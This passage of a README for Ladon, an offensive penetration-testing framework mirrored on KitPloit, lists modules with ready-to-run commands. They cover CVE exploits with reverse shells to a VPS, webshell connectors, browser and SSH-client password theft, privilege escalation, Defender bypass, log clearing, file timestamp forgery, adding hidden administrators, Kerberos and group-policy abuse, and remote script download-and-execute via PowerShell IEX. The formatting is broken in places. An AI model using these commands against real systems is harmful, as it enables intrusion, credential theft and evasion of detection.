Ladon gethtml http://192.168.1.1
146 One-Click Mini Web Server Dedicated Penetration Monitoring Web Server```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
Get external IP (Start WEB on VPS, target visits ip.txt or ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (No-echo vulnerability echo results)
##### Listen```Bash
Ladon web 800
Submit Return Plaintext```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Base64 encoded result```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64 Result Decryption```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Shiro Plugin Detection```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Delete specified IP logs of Tomcat```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 C# Custom Assembly Plugin Scanning```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile Read specified length of content from the start of a large file```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Modify registry to read plaintext passwords for systems from 2012 and later```Bash
Ladon SetMzLogonPwd 1
153 Modify Registry Hijacking Signature Verification```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 batch convert IPs to ip24 format (192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC batch convert IP to IP C format (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  Batch convert IP to IP B format(192.168.)```Bash
Ladon ip.txt IPB
157 Vulnerability Detection Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 Reverse Shell```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Certificate detection: device, IP, domain, machine name, organization, etc.```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo Batch detection of SSL certificate information for devices, IPs, domain names, machine names, organizations, etc.```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo Multiple Methods to Obtain WordPress Core, Theme, and Plugin Versions```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo Batch get WordPress core, themes, plugins versions```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164 Exchange Brute Force - Identify Exchange Password Brute Force```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Batch Detection of Zimbra Mail Server ZIP Path Traversal RCE Vulnerability```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra mail server Unauthorized RCE Vulnerability EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd Connect jsp WebShell (supports cd, k8, ua, uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell view system version, python, gcc and other information to facilitate privilege escalation```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd Connect to jsp WebShell (supports cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Non-interactive Connection IIS-Raid Backdoor Command Execution```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP matches whether the IP segment appears in the vulnerability results```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Router Password Extraction```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc Batch detection of printer PJL arbitrary code execution vulnerability```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Query manufacturer by MAC (Ladon Mac MAC address)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN router password brute force (built-in default passwords, supports plaintext and Hash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 Smiley backdoor vulnerability detection  10.9 removed```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress Password Audit, Weak Passwords```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Detect Exchange Version```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange High-Risk RCE Vulnerability Detection```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/S Get Web Page Response Headers```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S Get Web Page Response Header Information + Source Code```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S Get domain names from web pages```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP bypass CDN to obtain real IP of domain (available domain names, titles, banners and other unique keyword features)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Firefox passwords\Cookie\history records reading```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 silent support for Win7, Win8, Win11 Win2012\2016\2019 etc. Version 10.8 removed```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd supports password retrieval for Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan Password Audit and Weak Password Detection for Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Xshell Password Reader```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 Unauthorized Write SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  SQL Server Remote Command Execution SQL Version, OS Information xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server remote execution command efspotato, badpotato privilege escalation```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 Password Read```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan ZTE Router and Optical Modem Web Default Password Detection```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch Router Password Read```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2 Router Password Reading```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 T3 protocol detect WebLogic version```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

One-click Penetration InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan multiple modules detect system information```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan Multiple Remote Vulnerability Detection```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan Multiple Vulnerability Exploits GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 Unauthorized Website Database Password Read```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan All Modules```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Detect Citrix Gateway version```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Detect Vmware Vcenter version```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Bypass Defender to Execute PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP Restart HP Printer```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Clean operation logs Disable .NET logging```Bash
Ladon Clslog
206 Detecting Alive Hosts with ARP Protocol```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Mini FTP Server, (supports file upload/download using built-in ftp commands on Windows/Linux)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Monitor TCP packet data, save as TXT and HEX, such as SMB, RDP, HTTP, SSH, LDAP, FTP and other protocols.```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 Monitor UDP outgoing packet data, save TXT and HEX, such as DNS, SNMP and other protocols```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward port forwarding port relay```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211	CVE-2022-36537	Server Backup Manager Unauthorized RCE Vulnerability Detection (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper Unauthorized File Read EXP (default /WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 Completely disable SMB, block port 445 to prevent 0-day, lateral movement, relay attacks, etc.```Bash
Ladon CloseSMB
214 Disable Specified Service```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
215 Stop the specified service```Bash
Ladon StopService Spooler
216 Allowed Ports Open Ports```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 Block Port Intercept Port```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken Token Duplication Executor```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem Privilege Escalation: Admin to SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser降权 System权限降至用户执行程序```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato Privilege Escalation Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision Hikvision Password Audit```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 Hikvision CVE-2017-7921 Vulnerability Detection```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision Hikvision configuration file decryption```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon Test-only CmdShell```Bash
Ladon web 800 cmd
226 CmdShell for Connection Testing```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 View Domain Administrators```Bash
Ladon QueryAdminDomain
228 View domain information```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Mndp protocol broadcast detection for Mikrotik router information on the same subnet```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell connection tool, supports custom HTTP header submission```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd Execute Cmd command / support b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 View Admin IP, One-click Read Successful Login Log 4624```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 Remote Command Execution Vulnerability EXP```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon one-click anti-detection tool```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Win11/2022 System Privilege Escalation to SYSTEM```Bash	
Ladon McpPotato whoami
236 EXE to HEX, write to file via CMD command```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE to Base64, CMD Command Write to File```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbra mail system version detection```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO Domain Penetration Group Policy Lateral Movement Tool```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 One-Click Retrieval of IIS Website Information```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Penetration-Specific WEB Server LDAP Deserialization```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Penetration Testing Dedicated Web Server RMI Deserialization```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API adds administrator (bypasses system net, net1 disable)```Bash	
Ladon AddAdmin admin$ 123456
244 API Add User (Bypasses System net, net1.exe Disable)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API delete user (ignores system net, net1.exe disable)```Bash	
Ladon DelUser admin$
246 Rubeus Domain Penetration Kerberos Attacks

For example: TGT request/ST request/AS-REP Roasting/Kerberoasting/Delegation attacks/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket, etc.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac Domain Penetration / Domain Privilege Escalation CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere interacts with the guest operating system of vCenter-managed virtual machines to execute commands```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Dcom remote command execution via MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom Remote Command Execution via ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom Remote Command Execution via ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm Probe System Information(ports 25, 465, 587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm Detection System Information```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP Remote Query of Domain User IP```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Detect whether user is Lotus administrator```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA server one-click start, access DOC can also execute HTA```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer Detect Confluence Version```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD can be used to locate where Active Directory users log in and enumerate domain users```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Oracle database remote privilege escalation tool official driver >= .net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracle Database Remote Privilege Escalation Tool 3 Methods One-Click Privilege Escalation```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS dynamically compile C# code file```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Modify File Time - Specify File Time

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Modify File Timestamp Copy File Timestamp```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell version Ladon.ps1

0x001 Cmd interactive execution```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 Local Non-Interactive Execution```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 Remote Memory Loading Execution```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass bypass PowerShell default policy execution```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Custom port scanning```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon probe for live hosts```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon Custom Port Scanning```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 vulnerability detection```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

Example

http://k8gege.org/Ladon/example-en.html

Latest version

Latest version in small seal ring: http://k8gege.org/Ladon/update.txt

Stargazers over time

Stargazers over time

Download Tool